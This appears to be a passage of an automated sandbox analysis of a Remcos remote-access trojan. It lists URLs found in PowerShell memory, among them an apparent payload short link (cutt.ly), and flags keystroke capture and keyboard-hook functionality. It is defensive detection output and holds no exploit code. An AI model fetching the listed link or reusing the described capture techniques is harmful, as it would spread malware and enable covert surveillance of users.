                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                Source: powershell.exe, 00000007.00000002.2126470477.000000001B91E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
                Source: powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 00000007.00000003.2116860749.000000001CFF1000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
                Source: powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                Source: powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                Source: powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                Source: powershell.exe, 00000007.00000002.2123254821.00000000036CA000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
                Source: powershell.exe, 00000007.00000002.2119390457.0000000000416000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D
                Source: powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2116300399.000000001D033000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                Source: powershell.exe, 00000007.00000002.2126514479.000000001B925000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                Source: powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                Source: powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: powershell.exe, 00000007.00000002.2128046184.000000001CDE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: powershell.exe, 00000007.00000002.2128046184.000000001CDE7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 00000007.00000002.2123254821.00000000036CA000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
                Source: powershell.exe, 00000007.00000002.2120085059.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2156941353.00000000023B0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2176488120.0000000002350000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: powershell.exe, 00000007.00000002.2128403252.000000001D3B0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                Source: powershell.exe, 00000007.00000002.2128046184.000000001CDE7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: powershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmpString found in binary or memory: http://status.rapidssl.com0
                Source: powershell.exe, 00000007.00000002.2128046184.000000001CDE7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: powershell.exe, 00000007.00000002.2120085059.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2156941353.00000000023B0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2176488120.0000000002350000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
                Source: powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                Source: powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2128232737.000000001CFF3000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
                Source: powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
                Source: powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                Source: powershell.exe, 00000007.00000003.2116814482.000000001D020000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com0
                Source: powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                Source: powershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                Source: powershell.exe, 00000007.00000002.2128354221.000000001D0C7000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                Source: powershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
                Source: powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: powershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
                Source: powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                Source: powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                Source: powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
                Source: powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                Source: powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                Source: powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                Source: powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
                Source: powershell.exe, 00000007.00000003.2116822019.000000001D033000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
                Source: powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
                Source: powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: powershell.exe, 00000007.00000002.2128046184.000000001CDE7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                Source: powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: powershell.exe, 00000009.00000002.2156295854.000000000029E000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2175630207.00000000001AE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                Source: powershell.exe, 00000009.00000002.2156295854.000000000029E000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2175630207.00000000001AE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                Source: powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                Source: powershell.exe, 00000007.00000002.2126547382.000000001B92B000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                Source: powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                Source: powershell.exe, 00000007.00000003.2116860749.000000001CFF1000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                Source: powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                Source: powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                Source: powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.
                Source: powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.1
                Source: powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
                Source: powershell.exe, 00000007.00000002.2126470477.000000001B91E000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                Source: powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                Source: powershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
                Source: powershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly
                Source: powershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/
                Source: powershell.exe, 00000007.00000002.2119335898.0000000000380000.00000004.00000020.sdmp, powershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmp, powershell.exe, 00000007.00000002.2120903846.0000000002C11000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2120946858.0000000002C3F000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/mjfU5y0
                Source: powershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/mjfU5y0PE
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                Source: powershell.exe, 00000007.00000002.2123254821.00000000036CA000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                Source: powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                Source: powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                Source: powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                Source: powershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: powershell.exe, 00000007.00000002.2123254821.00000000036CA000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                Source: powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Contains functionality to capture and log keystrokesShow sources
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [Esc]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [Enter]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [Tab]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [Down]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [Right]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [Up]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [Left]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [End]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [F2]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [F1]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [Del]
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: [Del]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Esc]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Enter]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Tab]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Down]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Right]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Up]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Left]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [End]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [F2]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [F1]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Del]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Del]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Esc]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Enter]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Tab]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Down]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Right]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Up]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Left]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [End]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [F2]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [F1]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Del]
                Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeCode function: [Del]
                Contains functionality to register a low level keyboard hookShow sources
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_004052D5 SetWindowsHookExA 0000000D,004052BA,00000000,00000000
                Source: C:\Users\user\AppData\Local\Temp\sm.exeCode function: 18_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai
